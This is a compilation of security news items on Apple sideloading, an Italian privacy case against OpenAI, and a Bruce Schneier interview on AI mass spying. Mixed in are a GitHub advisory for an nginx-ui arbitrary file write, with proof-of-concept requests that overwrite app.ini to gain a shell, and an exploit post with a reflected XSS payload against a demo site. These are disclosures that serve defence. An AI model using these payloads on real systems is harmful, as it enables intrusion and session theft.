To comply with the EU's Digital Markets Act, Apple will allow European iPhone owners to install apps obtained from outside the official App store.

Despite several warnings about the risks, Apple will allow European iPhone owners to install apps obtained from outside the official App store (sideloading).

These drastic changes are brought about to comply with the European Union’s (EU) Digital Markets Act (DMA). The Digital Markets Act (DMA) establishes a set of clearly defined objective criteria to identify “gatekeepers”. Gatekeepers are large digital platforms providing so called core platform services, such as for example online search engines, app stores, and messenger services.

The Digital Markets Act aims to regulate the gatekeeper power of the largest digital companies. The EU designated iOS, Safari, and the App Store as “core platform services” under the Digital Markets Act. According to the DMA, Apple as it is now has a monopoly in the App Store, and will no longer be allowed to use that to enforce a monopoly in payments in apps.

For reference, something similar happened when the US accused Microsoft of illegally monopolizing the web browser market for Windows. A few law cases later they reached a settlement in which Microsoft agreed to modify some of its business practices, opening up the opportunity for Windows users to switch to other browsers.

The Apple Newsroom says:

> “The changes include more than 600 new APIs, expanded app analytics, functionality for alternative browser engines, and options for processing app payments and distributing iOS apps.”

But Apple also warns very firmly about the consequences.

> “The new options for processing payments and downloading apps on iOS open new avenues for malware, fraud and scams, illicit and harmful content, and other privacy and security threats.”

Another big change is that web browsers won’t be forced to use Safari’s WebKit engine, opening the space for Chromium based browsers and a more desktop-alike feel for Firefox.

The fact that Apple only allows other browsers to drop WebKit in Europe means that browser developers are forced to make hard choices. Mozilla spokesperson Damiano DeMonte tells The Verge it’s extremely disappointed with the way things turned out.

> “We are still reviewing the technical details but are extremely disappointed with Apple’s proposed plan to restrict the newly-announced BrowserEngineKit to EU-specific apps. The effect of this would be to force an independent browser like Firefox to build and maintain two separate browser implementations — a burden Apple themselves will not have to bear.”

We asked Malwarebytes Director of Core Technology and resident Apple expert Thomas Reed how he felt about the announced changes and the associated risks.

Thomas is waiting for more details as well, but he expects that Apple will use the experience it gathered with macOS by nature of its openness and only open it up only as much as it is forced to, and no more. Thomas expects Apple to impose notarization on iOS apps from outside the App Store, just as they did for macOS.

> “If they completely open up iOS to the same degree as macOS, I think there will be some inevitable malware, adware, and PUP issues. The biggest problem with iOS currently is PUPs and scam apps that manage to get past the review process. I think those will also be a problem with apps from outside the App Store, and I think Apple will combat those similarly. Which is to say, far from perfectly.”

Developers can get acquainted with these changes on the Apple Developer Support page and start testing new capabilities in the iOS 17.4 beta. The new capabilities will become available to users in the 27 EU countries around the beginning of March 2024.

Don’t rely on the fact that this will be limited to the EU. Although the most significant app policy changes apply only to EU countries, other shifts concerning cloud gaming and in-app purchases will take effect worldwide.

**We don’t just report on iOS security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your iOS devices by downloading Malwarebytes for iOS today.

 Apple warns of &#8220;privacy and security threats&#8221; after EU requires it to allow sideloading 

Italy's data protection authority (DPA) has notified ChatGPT-maker OpenAI of supposedly violating privacy laws in the region.
"The available evidence pointed to the existence of breaches of the provisions contained in the E.U. GDPR [General Data Protection Regulation]," the Garante per la protezione dei dati personali (aka the Garante) said in a statement on Monday.
It also said it

Generative AI / Data Privacy

Italy's data protection authority (DPA) has notified ChatGPT-maker OpenAI of supposedly violating privacy laws in the region.

"The available evidence pointed to the existence of breaches of the provisions contained in the E.U. GDPR \[General Data Protection Regulation\]," the Garante per la protezione dei dati personali (aka the Garante) said in a statement on Monday.

It also said it will "take account of the work in progress within the ad-hoc task force set up by the European Data Protection Framework (EDPB) in its final determination on the case."

The development comes nearly 10 months after the watchdog imposed a temporary ban on ChatGPT in the country, weeks after which OpenAI announced a number of privacy controls, including an opt-out form to remove one's personal data from being processed by the large language model (LLM). Access to the tool was subsequently reinstated in late April 2023.

The Italian DPA said the latest findings, which have not been publicly disclosed, are the result of a multi-month investigation that was initiated at the same time. OpenAI has been given 30 days to respond to the allegations.

BBC reported that the transgressions are related to collecting personal data and age protections. OpenAI, in its help page, says that "ChatGPT is not meant for children under 13, and we require that children ages 13 to 18 obtain parental consent before using ChatGPT."

But there are also concerns that sensitive information could be exposed as well as younger users may be exposed to inappropriate content generated by the chatbot.

Indeed, Ars Technica reported this week that ChatGPT is leaking private conversations that include login credentials and other personal details of unrelated users who are said to be employees of a pharmacy prescription drug portal.

Then in September 2023, Google's Bard chatbot was found to have a bug in the sharing feature that allowed private chats to be indexed by Google search, inadvertently exposing sensitive information that may have been shared in the conversations.

Generative artificial intelligence tools like ChatGPT, Bard, and Anthropic Claude rely on being fed large amounts of data from multiple sources on the internet.

In a statement shared with TechCrunch, OpenAI said its "practices align with GDPR and other privacy laws, and we take additional steps to protect people's data and privacy."

**Apple Warns Against Proposed U.K. Law**

The development comes as Apple said it's "deeply concerned" about proposed amendments to the U.K. Investigatory Powers Act (IPA) could give the government unprecedented power to "secretly veto" privacy and security updates to its products and services.

"It's an unprecedented overreach by the government and, if enacted, the U.K. could attempt to secretly veto new user protections globally preventing us from ever offering them to customers," the tech giant told BBC.

The U.K. Home Office said adopting secure communications technologies, including end-to-end encryption, cannot come at the cost of public safety as well as protecting the nation from child sexual abusers and terrorists.

The changes are aimed at improving the intelligence services' ability to "respond with greater agility and speed to existing and emerging threats to national security."

Specifically, they require technology companies that field government data requests to notify the U.K. government of any technical changes that could affect their "existing lawful access capabilities."

"A key driver for this amendment is to give operational partners time to understand the change and adapt their investigative techniques where necessary, which may in some circumstances be all that is required to maintain lawful access," the government notes in a fact sheet, adding "it does not provide powers for the Secretary of State to approve or refuse technical changes."

Apple, in July 2023, said it would rather stop offering iMessage and FaceTime services in the U.K. than compromise on users' privacy and security.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Italian Data Protection Watchdog Accuses ChatGPT of Privacy Violations

### Summary

The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.

https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72

```
func AddCert(c *gin.Context) {
	var json struct {
		Name                  string `json:"name"`
		SSLCertificatePath    string `json:"ssl_certificate_path" binding:"required"`
		SSLCertificateKeyPath string `json:"ssl_certificate_key_path" binding:"required"`
		SSLCertificate        string `json:"ssl_certificate"`
		SSLCertificateKey     string `json:"ssl_certificate_key"`
		ChallengeMethod       string `json:"challenge_method"`
		DnsCredentialID       int    `json:"dns_credential_id"`
	}
	if !api.BindAndValid(c, &json) {
		return
	}
	certModel := &model.Cert{
		Name:                  json.Name,
		SSLCertificatePath:    json.SSLCertificatePath,
		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
		ChallengeMethod:       json.ChallengeMethod,
		DnsCredentialID:       json.DnsCredentialID,
	}

	err := certModel.Insert()

	if err != nil {
		api.ErrHandler(c, err)
		return
	}

	content := &cert.Content{
		SSLCertificatePath:    json.SSLCertificatePath,
		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
		SSLCertificate:        json.SSLCertificate,
		SSLCertificateKey:     json.SSLCertificateKey,
	}

	err = content.WriteFile()

	if err != nil {
		api.ErrHandler(c, err)
		return
	}

	c.JSON(http.StatusOK, Transformer(certModel))
}

```
https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15

```
func (c *Content) WriteFile() (err error) {
	// MkdirAll creates a directory named path, along with any necessary parents,
	// and returns nil, or else returns an error.
	// The permission bits perm (before umask) are used for all directories that MkdirAll creates.
	// If path is already a directory, MkdirAll does nothing and returns nil.

	err = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)
	if err != nil {
		return
	}

	err = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)
	if err != nil {
		return
	}

	if c.SSLCertificate != "" {
		err = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)
		if err != nil {
			return
		}
	}

	if c.SSLCertificateKey != "" {
		err = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)
		if err != nil {
			return
		}
	}

	return
}
```


### PoC

```
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 144
Accept: application/json, text/plain, */*
Authorization: <JWT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
Connection: close

{"name":"poc","ssl_certificate_path":"/tmp/test","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"test","ssl_certificate_key":"test2"}
```

```
root@aze:~/nginx# ls -la /tmp/test*
-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test
-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2
```

It's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.

```
root@aze:~/nginx# cat app.ini  | grep "StartCmd"
StartCmd          = login
```
Then we overwrite the `StartCmd` with `bash`

```
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 980
Accept: application/json, text/plain, */*
Authorization: <JWT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
Connection: close

{"name":"poc","ssl_certificate_path":"/root/nginx/app.ini","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"[server]\r\nHttpHost          = 0.0.0.0\r\nHttpPort          = 9000\r\nRunMode           = debug\r\nJwtSecret         = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\r\nNodeSecret        = 139ab224-9e9e-444f-987e-b3a651175ad5\r\nHTTPChallengePort = 9180\r\nEmail             = props@pros.com\r\nDatabase          = database\r\nStartCmd          = bash\r\nCADir             = dqsdqsd\r\nDemo              = false\r\nPageSize          = 10\r\nGithubProxy       = dqsdqfsdfsdfsdfsd\r\n\r\n[nginx]\r\nAccessLogPath =\r\nErrorLogPath  =\r\nConfigDir     =\r\nPIDPath       =\r\nTestConfigCmd =\r\nReloadCmd     =\r\nRestartCmd    =\r\n\r\n[openai]\r\nBaseUrl = \r\nToken   =\r\nProxy   =\r\nModel   = \r\n\r\n[casdoor]\r\nEndpoint     =\r\nClientId     =\r\nClientSecret =\r\nCertificate  =\r\nOrganization =\r\nApplication  =\r\nRedirectUri  =","ssl_certificate_key":"test2"}
```

```
root@aze:~/nginx# cat app.ini  | grep "StartCmd"
StartCmd          = bash
```

For the new config to be applied the app needs to be restarted

![image](https://user-images.githubusercontent.com/26652608/299331664-6415a8c1-6611-4e53-8137-3e574c58da28.png)



### Impact

Arbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.

**Summary**

The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.

https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72

    func AddCert(c *gin.Context) {
    	var json struct {
    		Name                  string `json:"name"`
    		SSLCertificatePath    string `json:"ssl_certificate_path" binding:"required"`
    		SSLCertificateKeyPath string `json:"ssl_certificate_key_path" binding:"required"`
    		SSLCertificate        string `json:"ssl_certificate"`
    		SSLCertificateKey     string `json:"ssl_certificate_key"`
    		ChallengeMethod       string `json:"challenge_method"`
    		DnsCredentialID       int    `json:"dns_credential_id"`
    	}
    	if !api.BindAndValid(c, &json) {
    		return
    	}
    	certModel := &model.Cert{
    		Name:                  json.Name,
    		SSLCertificatePath:    json.SSLCertificatePath,
    		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
    		ChallengeMethod:       json.ChallengeMethod,
    		DnsCredentialID:       json.DnsCredentialID,
    	}
    
    	err := certModel.Insert()
    
    	if err != nil {
    		api.ErrHandler(c, err)
    		return
    	}
    
    	content := &cert.Content{
    		SSLCertificatePath:    json.SSLCertificatePath,
    		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
    		SSLCertificate:        json.SSLCertificate,
    		SSLCertificateKey:     json.SSLCertificateKey,
    	}
    
    	err = content.WriteFile()
    
    	if err != nil {
    		api.ErrHandler(c, err)
    		return
    	}
    
    	c.JSON(http.StatusOK, Transformer(certModel))
    }
    
    

https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write\_file.go#L15

    func (c *Content) WriteFile() (err error) {
    	// MkdirAll creates a directory named path, along with any necessary parents,
    	// and returns nil, or else returns an error.
    	// The permission bits perm (before umask) are used for all directories that MkdirAll creates.
    	// If path is already a directory, MkdirAll does nothing and returns nil.
    
    	err = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)
    	if err != nil {
    		return
    	}
    
    	err = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)
    	if err != nil {
    		return
    	}
    
    	if c.SSLCertificate != "" {
    		err = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)
    		if err != nil {
    			return
    		}
    	}
    
    	if c.SSLCertificateKey != "" {
    		err = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)
    		if err != nil {
    			return
    		}
    	}
    
    	return
    }
    

**PoC**

    POST /api/cert HTTP/1.1
    Host: 127.0.0.1:9000
    Content-Length: 144
    Accept: application/json, text/plain, */*
    Authorization: <JWT>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Content-Type: application/json
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
    Connection: close
    
    {"name":"poc","ssl_certificate_path":"/tmp/test","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"test","ssl_certificate_key":"test2"}
    

    root@aze:~/nginx# ls -la /tmp/test*
    -rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test
    -rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2
    

It's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.

    root@aze:~/nginx# cat app.ini  | grep "StartCmd"
    StartCmd          = login
    

Then we overwrite the StartCmd with bash

    POST /api/cert HTTP/1.1
    Host: 127.0.0.1:9000
    Content-Length: 980
    Accept: application/json, text/plain, */*
    Authorization: <JWT>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Content-Type: application/json
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
    Connection: close
    
    {"name":"poc","ssl_certificate_path":"/root/nginx/app.ini","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"[server]\r\nHttpHost          = 0.0.0.0\r\nHttpPort          = 9000\r\nRunMode           = debug\r\nJwtSecret         = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\r\nNodeSecret        = 139ab224-9e9e-444f-987e-b3a651175ad5\r\nHTTPChallengePort = 9180\r\nEmail             = props@pros.com\r\nDatabase          = database\r\nStartCmd          = bash\r\nCADir             = dqsdqsd\r\nDemo              = false\r\nPageSize          = 10\r\nGithubProxy       = dqsdqfsdfsdfsdfsd\r\n\r\n[nginx]\r\nAccessLogPath =\r\nErrorLogPath  =\r\nConfigDir     =\r\nPIDPath       =\r\nTestConfigCmd =\r\nReloadCmd     =\r\nRestartCmd    =\r\n\r\n[openai]\r\nBaseUrl = \r\nToken   =\r\nProxy   =\r\nModel   = \r\n\r\n[casdoor]\r\nEndpoint     =\r\nClientId     =\r\nClientSecret =\r\nCertificate  =\r\nOrganization =\r\nApplication  =\r\nRedirectUri  =","ssl_certificate_key":"test2"}
    

    root@aze:~/nginx# cat app.ini  | grep "StartCmd"
    StartCmd          = bash
    

For the new config to be applied the app needs to be restarted

**Impact**

Arbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.

**References**

*   GHSA-xvq9-4vpv-227m
*   https://nvd.nist.gov/vuln/detail/CVE-2024-23827
*   0xJacky/nginx-ui@8581bdd
*   https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72
*   https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write\_file.go#L15

GHSA-xvq9-4vpv-227m: Nginx-UI vulnerable to arbitrary file write through the Import Certificate feature

Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

Senior Privacy Advocate David Ruiz speaks with Bruce Schneier about artificial intelligence, surveillance, and an era of "mass spying."

For decades, governments and companies have surveilled the conversations, movements, and behavior of the public.

And then the internet came along and made that a whole lot easier.  

Today, search engines collect our queries, browsers collect our device information, smartphones collect out locations, social media platforms collect our conversations with one another, and, depending on the country, governments either collect that same information from the companies that maintain it, or they gather it directly themselves by monitoring their people.

That’s a lot of data that, until now, has been difficult to parse at scale.

But cryptographer and computer security professional Bruce Schneier believes that’s going to change, all because of the advent of artificial intelligence.

Already equipped with reams of data, governments and companies will now be able to ask AI models to make conclusions _from_ the data, Schneier said, supercharging the human work of inquiry with the limitless scale of AI.

“Spying is limited by the need for human labor,” Schneier wrote. “AI is about to change that.”

In January, Senior Privacy Advocate David Ruiz (and host of the Lock and Code podcast) spoke with Schneier about the future of AI-enabled mass spying—the implications, the responses from the public, and whether there’s any hope in dismantling a system so deeply embedded in the modern world.

Below is an edited transcript of their conversation.

**DAVID RUIZ**: We know that mass surveillance has this “Collect it all” mentality—of the NSA, obviously, but also from companies that gather clicks and shares and locations and app downloads and all of that.

What is the mass spying equivalent of that?

**BRUCE SCHNEIER**: So, it’s “Collect it all,” but it’s “Collect different things.”

Let’s step back here.

We kind of know what mass surveillance, mass spying looks like. It’s the kind of thing we saw in former East Germany, where like 10 percent of the population spied on 90 percent of the population. And it was incredibly manpower intensive.

Now, we moved into a world of automatic mass surveillance with the rise of the internet and the rise of cheap data storage and processing. This is maybe 20 years ago, when companies and the NSA start collecting mass surveillance data, and that is metadata—the kind of data that Snowden talked about—data about data. Data from your phone, from your browser, who you spoke to, where you went, what you spent money on, what websites you visited, that’s kind of mass surveillance data.

> Spying, the difference I’m making, is about conversations.

And while computers were easily able to interpret location data and data about who you spoke to—your email “from” and “to” lines—they weren’t able to interpret what you said.  Voice conversations, text conversations, email conversations, they could do keyword searches and if you think about, Chinese censorship is based pretty naively on keyword searches. \[For instance,\] you say the bad word, you get censored. That’s still very primitive.

Spying—listening in on a conversation, knowing what people are saying—required human beings, and there weren’t enough humans to listen to everything. So, you had this automatic surveillance: We can know where everybody is, that’s easy.  But knowing what everybody’s saying, we still couldn’t do—we didn’t have the people.

As AI becomes increasingly capable of understanding and even having conversations, it can start doing the role that people used to do and engage in this kind of spying at a mass level.

Now, the question you asked started me in this monologue is what did that look like? And the answer is: We have no idea.

We kind of know what East Germany looked like, former Soviet Union. We do know what some of these countries look like. But I don’t think it’s the same. It is not this kind of mass spying by corporations. Or by democratic governments. So, we don’t know. But it’s worth at least thinking about. 

**DAVID RUIZ**: When I was trying to answer my own question, I feel like one of the potential futures here is, instead of “Collect it all,” it’s this attempt at “Know it all.”

**BRUCE SCHNEIER**: It always was “Know it all,” but now it becomes more possible.

**DAVID RUIZ**: Yeah, and I was hypothesizing that there might be companies that say “We have created a package of questions that we use on AIs that we know and trust to discover these new insights,” and \[they\] sell these packages to companies that are trying to find out XYZ and ABC about their customers, or governments about their persons.

And that already sounds awful. It sounds both boring and dreadful, which is what I think surveillance is today—it is boring operationally in terms of \[how\] we don’t see data brokers. We don’t see what gets collected every single day behind the interface of the web. But it is used so much to power the direction of the web.

**BRUCE SCHNEIER**: And my guess is that’s right. And it’s not actually boring. Certainly, the companies wanted you to think that. It is very hidden. Data brokers spent a lot of effort making sure that there’s no visibility into their industry, so we don’t know the data being collected on us.

But remember, this is still all surveillance data. It’s not the contents of your phone calls, it’s the billing information. It’s who you called, what time, how long you spoke, that kind of information. Maybe the location of your two phones when you were talking. This brings it up to another level. 

**DAVID RUIZ**: You mentioned that this is the conversations—the content of communications. And I wanted to address that immediately because I think whenever spying is discussed, a lot of folks picture someone rifling through text messages or emails. And I think some people might balk at that. They might say and reject the premise based on things like “Oh, Apple can’t look at my iMessages, and Google said it wouldn’t advertise based on email content some years ago, and my phone provider, I don’t think, is recording my phone calls.”

So, my question after those kinds of claims, is: Is that too narrow a lens to understand this future of mass spying? What am I missing when I say those things to calm myself down?

**BRUCE SCHNEIER**: I think it’s all economics. Google did realize that eavesdropping on the contents of your Gmail wasn’t terribly useful. So, they didn’t do it. Of course, they made a virtue out of it. That stuff will change.

We’re already seeing \[the questions of\] “Is this company using your data to train their AI? Will it be used to influence how an AI interacts with you?”\[And\] already we can see that the tones of voice we use with these AI chatbots is mirrored. They say they’re not storing it and using it for training—we don’t know the answer.

As this stuff becomes more valuable, as companies see a business interest in using it, of course it’s going to be used. It’s not going to be a world where we \[can\] rely on the goodness of the hearts of for-profit corporations not to abuse our privacy.

So, it’s a matter of how cheap it is. It is going to become cheap for Google to eavesdrop on the contents of everyone’s email conversations, or for Zoom to eavesdrop on all meetings? They currently say they’re not \[monitoring meetings in\] their terms of service, they’ll probably \[receive\] push back if they change it—they were already pushed back because there was a thought that Zoom would be using your information to train an AI. \[It\] turned out to not be true, but there was a little panic there. But how long does that last? 

We saw this with Facebook and their surveillance over the years and decades.

They did a new thing, there was a pushback, there’s an outcry, and after a couple months, it was the new normal. So, I don’t know where this is going to go, but the tech is moving to the point where this stuff is possible and, in fact, easy. 

**DAVID RUIZ**: We talked about the business case for \[AI-enabled mass spying\] and I wanted to ask more broadly: Who will engage in AI mass spying?

**BRUCE SCHNEIER**: The answer is going to be everybody who can.

Who are the major players here? Certainly there are corporations who are doing it for manipulation purposes. Surveillance is the business model of the internet because advertising is the business model of the internet, and advertising is convincing you to do something that you might not have done otherwise.

So, this surveillance-based manipulation is the business model, and anything that gives a company an advantage, they’re going to do. We \[already\] saw that with personalized advertising \[which is\] based on characteristics that you might not be happy sharing.

So, companies will do that.

Now, in the West, we tend not to have governments do this on their own citizens—they rely on corporations. The US government doesn’t spy on us directly, they get the spying data from corporations who do that to everybody.

You go to other countries, more totalitarian countries, and governments do engage in surveillance and will engage in spying. Here, I’m thinking about China, but other countries as well. So, very much think of it in terms of power:

> Those that have the power will engage in the behaviors because it magnifies their power. There is no surprise. 

**DAVID RUIZ**: There’s a lot of times where we could think “Why would a company do this? Why would a government do this?” And there’s a lot of alleged reasons. The NSA will say that it collects as much data as possible for national security reasons, but they’ve been saying that for decades, and the national security reason seems to change every few years, right? There’s a, there’s a “national security risk du jour.”

And it’s much easier and simpler to think of it as those that have power hope to keep that power and amass more of it.

I wanted to separately ask: We talked about corporations. We talked about governments. What about people? I have access to AI tools in a way that I don’t have access to data collection regimes.

So, are people going to spy on people?

**BRUCE SCHNEIER**:  People are already spying on people. It’s more one-on-one. There’s an entire industry of super creepy spyware that is sold to people who want to spy on their wives and girlfriends. This is kind of a gross industry, but it exists and it is used in many countries.

So, yes. But here again, the power matters, and it’s generally the more powerful spying on the less powerful in a relationship. It’s generally the man spying on the woman because that’s the power imbalance.

When you think about bulk surveillance, it’s access to the data.

I really can’t spy on my neighborhood. Sure, I can set up a camera in front of my house and watch what’s going on in my street, but that’s all I could do. I don’t have the power to put cameras everywhere. I don’t have the power to get your email or your Zoom stream.

So, I think you are going to see some use of these technologies by people who are not traditionally powerful. But in general, like all these technologies, they benefit the powerful more than the less powerful.

**DAVID RUIZ**: We know that people act differently when they know they’re being surveilled—will that also apply to mass spying?

**BRUCE SCHNEIER**: Certainly, people in the United States have lived out of this kind of regime in post-9/11. Lots of Muslims lived in a world where they were being spied on a lot.

Lots of people—Jon Penney comes to mind, there are others—have researched how the feeling that you’re under constant surveillance—or spying, they’re both the same here—leads to self-censorship.

If you think you are being watched all the time, you behave differently. We do know that there’s an enormous chilling effect on how you behave, what you do, on your conformity. And if you think you’re being watched all the time, you tend to conform. You’re not going to do something different. You’re not going to stand out.

> This seems really bad for society because that’s how society innovates. A world where people don’t try new things is a world that stagnates.

To take an easy example, about 10 years ago, I forget the year, gay marriage became legal in the United States, in all 50 states. It became the law of the land and that change was the result of a multi-decade process. For a while it was illegal and immoral, then it was illegal and moral, and then it became legal and moral.  And in order for that to happen—in order for that whole progression—somebody way back in the beginning had to try gay sex once and say: “You know, that wasn’t so bad. That was kind of fun.”

And the reason they were able to do that is that they weren’t being watched. They could do it in the privacy of their own bedroom and no one could stop them.

If you live in a world where, whether it’s gay sex or marijuana or whatever it is that becomes the mainstream moral norm over several generations, if you can’t try it, if there can’t be a counterculture of doing it, it never will become the social norm. If everybody who tried pot in the ‘50s was immediately discovered and arrested, you’d never get to legalization. You never would get a generation of people that would say, “You know, that’s not that bad. Why are we criminalizing this kind of not harmful drug?”

**DAVID RUIZ**: On the current environment that we live in, where so much surveillance happens every day—again, both from corporations and from governments—it doesn’t seem like there’s any way to dismantle it. And it feels like the potential of mass spying to produce even deeper insights means that we’ve lost the battle on surveillance. Have we lost that battle?

**BRUCE SCHNEIER**: I never think it’s too late, and that kind of fatalism doesn’t make sense when you look at history. It’s like saying in the 1200s, “Well, we tried to fight against monarchy. I guess that didn’t work. It’s too late.” Or centuries later, “You know, we tried to fight against slavery, that didn’t work.” Or, “You know, we’ll never give women the vote. That ship has sailed.”

> We, as a species, regularly make our society more moral, more ethical, more egalitarian. It’s slow, it’s bursty, but decade over decade, century over century, we are improving.

So, no, I don’t think from now until the end of our species, the level of surveillance we see today cannot be rolled back. I think that is ridiculous.

We no longer send five-year-olds up chimneys to clean them. We don’t do that. We changed. We no longer allow companies to sell pajamas that catch on fire. We changed. We can do that here.

Like the other big things, like monarchy, like slavery, like the patriarchy, these things are going to be hard to dismantle, but they are dismantlable.

Near term, I think you’re right. Near term, both companies and governments are just punch-drunk on our data, and they’re not going to give it up. But long term, lots of things are possible and will happen. 

**DAVID RUIZ**: I mean this as a high compliment: You are the most optimistic guest we’ve had on the podcast.

**BRUCE SCHNEIER**: I’m near term pessimistic and long term optimistic. Near term, I think we’re screwed. The tech monopolies are so powerful, and we saw that with social media. Both Republicans and Democrats agreed—this never happened before—that Facebook was harming our society in different ways, but it’s harming society. \[They\] called Zuckerberg in, called the other companies in, yelled at them, \[said\] something must be done, and nothing was done.

That is sheer lobbying power right there in operation.

So, near term, I don’t see any solution, but our species has handled harder problems than this. This won’t be the one that stumps us.

**DAVID RUIZ**: What do we do at this point? 

**BRUCE SCHNEIER**: I want this to be a political issue. This stuff changes when it becomes an issue that voters care about. If there is a debate question on this, if this becomes something that politicians are asked about, then change will happen, right? If it isn’t, then it is really just the lobbyists that get to decide what happens.

“What should we do?” is agitate for change. Make this political, make this something that politicians can’t ignore.

Where change is happening is the EU. You have listeners in the EU, and they will know that things are happening there. Right now, Europe is the regulatory superpower on the planet. They are the jurisdiction where we got a comprehensive data privacy law, where they are passing an AI security law, stuff that you would never see in the United States.

So, look outside the US right now, but make this political. That’s how we’re going to make it better.

But we’re fighting uphill. It’s very hard in the United States to enact policies that the money doesn’t want. Money gets its way in in US policy. And the money wants this. 

**DAVID RUIZ**: And I think disentangling money from politics in the United States is a different \[conversation\], and unfortunately we don’t have the time for it.

**BRUCE SCHNEIER**: No, surely you can solve that in half an hour.

**DAVID RUIZ**: Actually, are you booked for the next half hour?

**BRUCE SCHNEIER**: If I was able to solve that, I would be not doing what I’m doing now, because, you’re right, that might not be the most important problem, but as Professor Larry Lessig said, it’s the first problem. It’s a problem we need to solve to solve every other problem.

 In conversation: Bruce Schneier on AI-powered mass spying 

